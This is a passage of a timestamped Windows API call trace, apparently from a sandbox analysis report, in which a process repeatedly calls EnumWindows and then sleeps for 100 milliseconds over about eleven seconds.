(lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.854] Sleep (dwMilliseconds=0x64) [0152.856] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.856] Sleep (dwMilliseconds=0x64) [0152.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.861] Sleep (dwMilliseconds=0x64) [0152.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.863] Sleep (dwMilliseconds=0x64) [0152.865] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.865] Sleep (dwMilliseconds=0x64) [0152.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.869] Sleep (dwMilliseconds=0x64) [0152.870] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.870] Sleep (dwMilliseconds=0x64) [0152.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.873] Sleep (dwMilliseconds=0x64) [0152.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.877] Sleep (dwMilliseconds=0x64) [0152.879] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.879] Sleep (dwMilliseconds=0x64) [0152.882] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.882] Sleep (dwMilliseconds=0x64) [0152.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.885] Sleep (dwMilliseconds=0x64) [0152.886] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.888] Sleep (dwMilliseconds=0x64) [0152.893] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.893] Sleep (dwMilliseconds=0x64) [0152.894] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.898] Sleep (dwMilliseconds=0x64) [0152.899] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.900] Sleep (dwMilliseconds=0x64) [0152.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.903] Sleep (dwMilliseconds=0x64) [0152.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.905] Sleep (dwMilliseconds=0x64) [0152.906] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.906] Sleep (dwMilliseconds=0x64) [0152.911] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.912] Sleep (dwMilliseconds=0x64) [0152.913] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.915] Sleep (dwMilliseconds=0x64) [0152.919] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.920] Sleep (dwMilliseconds=0x64) [0152.925] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.928] Sleep (dwMilliseconds=0x64) [0152.932] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.933] Sleep (dwMilliseconds=0x64) [0152.935] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.935] Sleep (dwMilliseconds=0x64) [0152.938] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.939] Sleep (dwMilliseconds=0x64) [0152.941] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.943] Sleep (dwMilliseconds=0x64) [0152.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.946] Sleep (dwMilliseconds=0x64) [0152.948] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0152.952] Sleep (dwMilliseconds=0x64) [0153.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.055] Sleep (dwMilliseconds=0x64) [0153.133] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.133] Sleep (dwMilliseconds=0x64) [0153.188] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.188] Sleep (dwMilliseconds=0x64) [0153.223] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.223] Sleep (dwMilliseconds=0x64) [0153.260] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.261] Sleep (dwMilliseconds=0x64) [0153.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.296] Sleep (dwMilliseconds=0x64) [0153.375] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.376] Sleep (dwMilliseconds=0x64) [0153.450] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.451] Sleep (dwMilliseconds=0x64) [0153.504] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.505] Sleep (dwMilliseconds=0x64) [0153.541] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.541] Sleep (dwMilliseconds=0x64) [0153.579] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.579] Sleep (dwMilliseconds=0x64) [0153.659] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.660] Sleep (dwMilliseconds=0x64) [0153.741] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.742] Sleep (dwMilliseconds=0x64) [0153.790] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.790] Sleep (dwMilliseconds=0x64) [0153.826] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.826] Sleep (dwMilliseconds=0x64) [0153.869] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0153.870] Sleep (dwMilliseconds=0x64) [0154.034] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.034] Sleep (dwMilliseconds=0x64) [0154.148] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.148] Sleep (dwMilliseconds=0x64) [0154.207] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.208] Sleep (dwMilliseconds=0x64) [0154.253] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.254] Sleep (dwMilliseconds=0x64) [0154.314] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.315] Sleep (dwMilliseconds=0x64) [0154.410] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.411] Sleep (dwMilliseconds=0x64) [0154.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.489] Sleep (dwMilliseconds=0x64) [0154.541] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.541] Sleep (dwMilliseconds=0x64) [0154.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.549] Sleep (dwMilliseconds=0x64) [0154.579] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.608] Sleep (dwMilliseconds=0x64) [0154.667] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.668] Sleep (dwMilliseconds=0x64) [0154.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.751] Sleep (dwMilliseconds=0x64) [0154.814] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.815] Sleep (dwMilliseconds=0x64) [0154.851] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.851] Sleep (dwMilliseconds=0x64) [0154.890] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.891] Sleep (dwMilliseconds=0x64) [0154.893] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.899] Sleep (dwMilliseconds=0x64) [0154.909] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.911] Sleep (dwMilliseconds=0x64) [0154.989] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0154.990] Sleep (dwMilliseconds=0x64) [0155.035] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.092] Sleep (dwMilliseconds=0x64) [0155.160] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.201] Sleep (dwMilliseconds=0x64) [0155.236] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.240] Sleep (dwMilliseconds=0x64) [0155.242] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.243] Sleep (dwMilliseconds=0x64) [0155.247] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.247] Sleep (dwMilliseconds=0x64) [0155.259] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.263] Sleep (dwMilliseconds=0x64) [0155.265] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.266] Sleep (dwMilliseconds=0x64) [0155.269] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.271] Sleep (dwMilliseconds=0x64) [0155.272] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.274] Sleep (dwMilliseconds=0x64) [0155.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.281] Sleep (dwMilliseconds=0x64) [0155.283] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.285] Sleep (dwMilliseconds=0x64) [0155.291] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.291] Sleep (dwMilliseconds=0x64) [0155.293] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.296] Sleep (dwMilliseconds=0x64) [0155.301] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.301] Sleep (dwMilliseconds=0x64) [0155.370] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.371] Sleep (dwMilliseconds=0x64) [0155.447] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.447] Sleep (dwMilliseconds=0x64) [0155.502] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.502] Sleep (dwMilliseconds=0x64) [0155.512] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.515] Sleep (dwMilliseconds=0x64) [0155.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.533] Sleep (dwMilliseconds=0x64) [0155.551] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.551] Sleep (dwMilliseconds=0x64) [0155.564] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.564] Sleep (dwMilliseconds=0x64) [0155.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.591] Sleep (dwMilliseconds=0x64) [0155.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.594] Sleep (dwMilliseconds=0x64) [0155.600] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.600] Sleep (dwMilliseconds=0x64) [0155.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.608] Sleep (dwMilliseconds=0x64) [0155.680] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.680] Sleep (dwMilliseconds=0x64) [0155.763] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.764] Sleep (dwMilliseconds=0x64) [0155.858] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.858] Sleep (dwMilliseconds=0x64) [0155.897] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.915] Sleep (dwMilliseconds=0x64) [0155.931] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.931] Sleep (dwMilliseconds=0x64) [0155.932] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0155.944] Sleep (dwMilliseconds=0x64) [0156.009] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.010] Sleep (dwMilliseconds=0x64) [0156.117] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.117] Sleep (dwMilliseconds=0x64) [0156.184] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.185] Sleep (dwMilliseconds=0x64) [0156.212] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.229] Sleep (dwMilliseconds=0x64) [0156.231] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.232] Sleep (dwMilliseconds=0x64) [0156.234] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.236] Sleep (dwMilliseconds=0x64) [0156.249] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.249] Sleep (dwMilliseconds=0x64) [0156.254] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.256] Sleep (dwMilliseconds=0x64) [0156.263] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.264] Sleep (dwMilliseconds=0x64) [0156.269] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.269] Sleep (dwMilliseconds=0x64) [0156.273] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.274] Sleep (dwMilliseconds=0x64) [0156.275] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.278] Sleep (dwMilliseconds=0x64) [0156.279] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.288] Sleep (dwMilliseconds=0x64) [0156.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.341] Sleep (dwMilliseconds=0x64) [0156.415] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.415] Sleep (dwMilliseconds=0x64) [0156.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.477] Sleep (dwMilliseconds=0x64) [0156.478] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.478] Sleep (dwMilliseconds=0x64) [0156.491] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.495] Sleep (dwMilliseconds=0x64) [0156.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.513] Sleep (dwMilliseconds=0x64) [0156.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.523] Sleep (dwMilliseconds=0x64) [0156.525] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.525] Sleep (dwMilliseconds=0x64) [0156.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.527] Sleep (dwMilliseconds=0x64) [0156.565] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.566] Sleep (dwMilliseconds=0x64) [0156.599] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.599] Sleep (dwMilliseconds=0x64) [0156.709] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.709] Sleep (dwMilliseconds=0x64) [0156.811] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.812] Sleep (dwMilliseconds=0x64) [0156.853] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.854] Sleep (dwMilliseconds=0x64) [0156.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.861] Sleep (dwMilliseconds=0x64) [0156.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.885] Sleep (dwMilliseconds=0x64) [0156.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.924] Sleep (dwMilliseconds=0x64) [0156.943] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0156.950] Sleep (dwMilliseconds=0x64) [0157.000] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.001] Sleep (dwMilliseconds=0x64) [0157.109] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.110] Sleep (dwMilliseconds=0x64) [0157.169] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.170] Sleep (dwMilliseconds=0x64) [0157.198] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.208] Sleep (dwMilliseconds=0x64) [0157.220] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.221] Sleep (dwMilliseconds=0x64) [0157.245] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.246] Sleep (dwMilliseconds=0x64) [0157.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.287] Sleep (dwMilliseconds=0x64) [0157.336] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.362] Sleep (dwMilliseconds=0x64) [0157.406] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.407] Sleep (dwMilliseconds=0x64) [0157.463] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.463] Sleep (dwMilliseconds=0x64) [0157.466] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.467] Sleep (dwMilliseconds=0x64) [0157.469] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.470] Sleep (dwMilliseconds=0x64) [0157.471] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.473] Sleep (dwMilliseconds=0x64) [0157.475] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.475] Sleep (dwMilliseconds=0x64) [0157.482] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.482] Sleep (dwMilliseconds=0x64) [0157.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.485] Sleep (dwMilliseconds=0x64) [0157.490] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.492] Sleep (dwMilliseconds=0x64) [0157.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.624] Sleep (dwMilliseconds=0x64) [0157.692] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.693] Sleep (dwMilliseconds=0x64) [0157.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.777] Sleep (dwMilliseconds=0x64) [0157.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.868] Sleep (dwMilliseconds=0x64) [0157.878] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.878] Sleep (dwMilliseconds=0x64) [0157.908] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.909] Sleep (dwMilliseconds=0x64) [0157.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.945] Sleep (dwMilliseconds=0x64) [0157.983] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0157.984] Sleep (dwMilliseconds=0x64) [0158.026] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.026] Sleep (dwMilliseconds=0x64) [0158.120] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.121] Sleep (dwMilliseconds=0x64) [0158.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.147] Sleep (dwMilliseconds=0x64) [0158.203] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.204] Sleep (dwMilliseconds=0x64) [0158.275] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.276] Sleep (dwMilliseconds=0x64) [0158.348] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.349] Sleep (dwMilliseconds=0x64) [0158.398] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.399] Sleep (dwMilliseconds=0x64) [0158.469] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.470] Sleep (dwMilliseconds=0x64) [0158.542] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.542] Sleep (dwMilliseconds=0x64) [0158.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.590] Sleep (dwMilliseconds=0x64) [0158.670] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.670] Sleep (dwMilliseconds=0x64) [0158.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.776] Sleep (dwMilliseconds=0x64) [0158.842] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.842] Sleep (dwMilliseconds=0x64) [0158.895] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.896] Sleep (dwMilliseconds=0x64) [0158.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0158.969] Sleep (dwMilliseconds=0x64) [0159.040] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.040] Sleep (dwMilliseconds=0x64) [0159.117] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.117] Sleep (dwMilliseconds=0x64) [0159.200] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.202] Sleep (dwMilliseconds=0x64) [0159.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.288] Sleep (dwMilliseconds=0x64) [0159.333] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.351] Sleep (dwMilliseconds=0x64) [0159.401] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.401] Sleep (dwMilliseconds=0x64) [0159.473] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.473] Sleep (dwMilliseconds=0x64) [0159.531] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.532] Sleep (dwMilliseconds=0x64) [0159.580] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.581] Sleep (dwMilliseconds=0x64) [0159.664] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.665] Sleep (dwMilliseconds=0x64) [0159.735] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.736] Sleep (dwMilliseconds=0x64) [0159.772] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.772] Sleep (dwMilliseconds=0x64) [0159.862] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.863] Sleep (dwMilliseconds=0x64) [0159.982] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0159.982] Sleep (dwMilliseconds=0x64) [0160.030] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.030] Sleep (dwMilliseconds=0x64) [0160.125] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.126] Sleep (dwMilliseconds=0x64) [0160.206] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.206] Sleep (dwMilliseconds=0x64) [0160.271] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.272] Sleep (dwMilliseconds=0x64) [0160.317] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.321] Sleep (dwMilliseconds=0x64) [0160.393] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.394] Sleep (dwMilliseconds=0x64) [0160.465] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.466] Sleep (dwMilliseconds=0x64) [0160.506] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.506] Sleep (dwMilliseconds=0x64) [0160.573] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.574] Sleep (dwMilliseconds=0x64) [0160.656] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.657] Sleep (dwMilliseconds=0x64) [0160.717] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.718] Sleep (dwMilliseconds=0x64) [0160.778] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.779] Sleep (dwMilliseconds=0x64) [0160.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.856] Sleep (dwMilliseconds=0x64) [0160.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.928] Sleep (dwMilliseconds=0x64) [0160.969] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0160.970] Sleep (dwMilliseconds=0x64) [0161.066] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.066] Sleep (dwMilliseconds=0x64) [0161.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.140] Sleep (dwMilliseconds=0x64) [0161.187] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.187] Sleep (dwMilliseconds=0x64) [0161.268] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.268] Sleep (dwMilliseconds=0x64) [0161.348] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.349] Sleep (dwMilliseconds=0x64) [0161.409] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.410] Sleep (dwMilliseconds=0x64) [0161.461] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.462] Sleep (dwMilliseconds=0x64) [0161.535] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.536] Sleep (dwMilliseconds=0x64) [0161.614] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.614] Sleep (dwMilliseconds=0x64) [0161.647] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.662] Sleep (dwMilliseconds=0x64) [0161.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.710] Sleep (dwMilliseconds=0x64) [0161.786] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.787] Sleep (dwMilliseconds=0x64) [0161.830] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.831] Sleep (dwMilliseconds=0x64) [0161.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0161.919] Sleep (dwMilliseconds=0x64) [0162.002] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.003] Sleep (dwMilliseconds=0x64) [0162.107] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.108] Sleep (dwMilliseconds=0x64) [0162.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.159] Sleep (dwMilliseconds=0x64) [0162.237] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.238] Sleep (dwMilliseconds=0x64) [0162.365] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.366] Sleep (dwMilliseconds=0x64) [0162.512] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.512] Sleep (dwMilliseconds=0x64) [0162.519] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.522] Sleep (dwMilliseconds=0x64) [0162.580] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.581] Sleep (dwMilliseconds=0x64) [0162.669] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.669] Sleep (dwMilliseconds=0x64) [0162.738] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.738] Sleep (dwMilliseconds=0x64) [0162.795] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.795] Sleep (dwMilliseconds=0x64) [0162.878] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0162.971] Sleep (dwMilliseconds=0x64) [0163.029] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.029] Sleep (dwMilliseconds=0x64) [0163.082] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.083] Sleep (dwMilliseconds=0x64) [0163.154] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.155] Sleep (dwMilliseconds=0x64) [0163.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.186] Sleep (dwMilliseconds=0x64) [0163.200] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.200] Sleep (dwMilliseconds=0x64) [0163.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.240] Sleep (dwMilliseconds=0x64) [0163.286] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.287] Sleep (dwMilliseconds=0x64) [0163.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.290] Sleep (dwMilliseconds=0x64) [0163.363] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.364] Sleep (dwMilliseconds=0x64) [0163.536] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.590] Sleep (dwMilliseconds=0x64) [0163.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.592] Sleep (dwMilliseconds=0x64) [0163.594] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.594] Sleep (dwMilliseconds=0x64) [0163.595] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.596] Sleep (dwMilliseconds=0x64) [0163.597] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.597] Sleep (dwMilliseconds=0x64) [0163.599] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.599] Sleep (dwMilliseconds=0x64) [0163.601] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.601] Sleep (dwMilliseconds=0x64) [0163.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.603] Sleep (dwMilliseconds=0x64) [0163.604] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.604] Sleep (dwMilliseconds=0x64) [0163.606] EnumWindows 